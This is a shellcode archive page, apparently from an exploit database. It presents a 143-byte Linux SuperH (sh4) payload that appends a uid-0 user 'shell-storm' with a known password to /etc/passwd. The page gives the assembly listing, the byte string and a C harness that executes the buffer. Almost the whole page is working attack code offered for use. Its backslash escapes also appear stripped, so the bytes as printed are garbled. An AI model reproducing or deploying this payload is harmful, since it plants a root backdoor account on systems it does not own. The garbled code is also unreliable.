[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : SuperH (sh4) Add root user with password
# Published : 2011-06-23
# Author :
# Previous Title : linux/x86-64 execve(/bin/sh) 52 bytes
# Next Title : Linux/MIPS - add user(UID 0) with password - 164 bytes


/*
** Title:     Linux/SuperH - sh4 - add root user with password - 143 bytes
** Date:      2011-06-23
** Tested on: debian-sh4 2.6.32-5-sh7751r
** Author:    Jonathan Salwan - twitter: @jonathansalwan
**
** http://shell-storm.org
**
** Informations:
** -------------
**               - user: shell-storm
**               - pswd: toor
**               - uid : 0
** 
** open:
**         mov      #5, r3
**         mova     @(130, pc), r0
**         mov      r0, r4
**         mov      #255, r13
**         mov      #4, r12
**         mul.l    r13, r12
**         sts      macl, r5
**         add      #69, r5
**         mov      #84, r13
**         mov      #5, r12
**         mul.l    r13, r12
**         sts      macl, r6
**         trapa    #2
**         mov      r0, r11
** 
** write:
**         xor      r6, r6
**         xor      r5, r5
**         mov      #4, r3
**         mov      r11, r4
**         mova     @(20, pc), r0
**         mov      r0, r5
**         mov      #72, r6
**         trapa    #2
** 
** close:
**         mov      #6, r3
**         mov      r11, r4
**         trapa    #2
** 
** exit:
**         mov      #1, r3
**         xor      r4, r4
**         trapa    #2
**         
** user:
**         .string "shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bashn"
** 
** file:
**         .string "@@@/etc/passwd"
**
**
** The '@@@' is just for alignment.
**
*/

#include <stdio.h>
#include <string.h>


char *SC = 
           /* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND, 0644) = fd */
           "x05xe3x20xc7x03x64xffxed"
           "x04xecxd7x0cx1ax05x45x75"
           "x54xedx05xecxd7x0cx1ax06"
           "x02xc3"

           /* r11 = fd */
           "x03x6b"

           /* write(fd, "shell-storm:$1$KQYl/yru$PMt02zUTW"..., 72) */
           "x6ax26x5ax25x04xe3xb3x64"
           "x04xc7x03x65x48xe6x02xc3"

           /* close(fd) */
           "x06xe3xb3x64x02xc3"

           /* exit(0) */
           "x01xe3x4ax24x02xc3"

           /* shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bashn */
           "x73x68x65x6cx6cx2dx73x74"
           "x6fx72x6dx3ax24x31x24x4b"
           "x51x59x6cx2fx79x72x75x24"
           "x50x4dx74x30x32x7ax55x54"
           "x57x6dx4dx76x50x57x63x55"
           "x34x6fx51x4cx73x2fx3ax30"
           "x3ax30x3ax72x6fx6fx74x3a"
           "x2fx72x6fx6fx74x3ax2fx62"
           "x69x6ex2fx62x61x73x68x5c"
           "x6e"

           /* @@@/etc/passwd */ 
           "x40x40x40x2fx65x74x63x2f"
           "x70x61x73x73x77x64";


int main(void)
{
   fprintf(stdout,"Length: %dn",strlen(SC));
   (*(void(*)()) SC)();
return 0;
}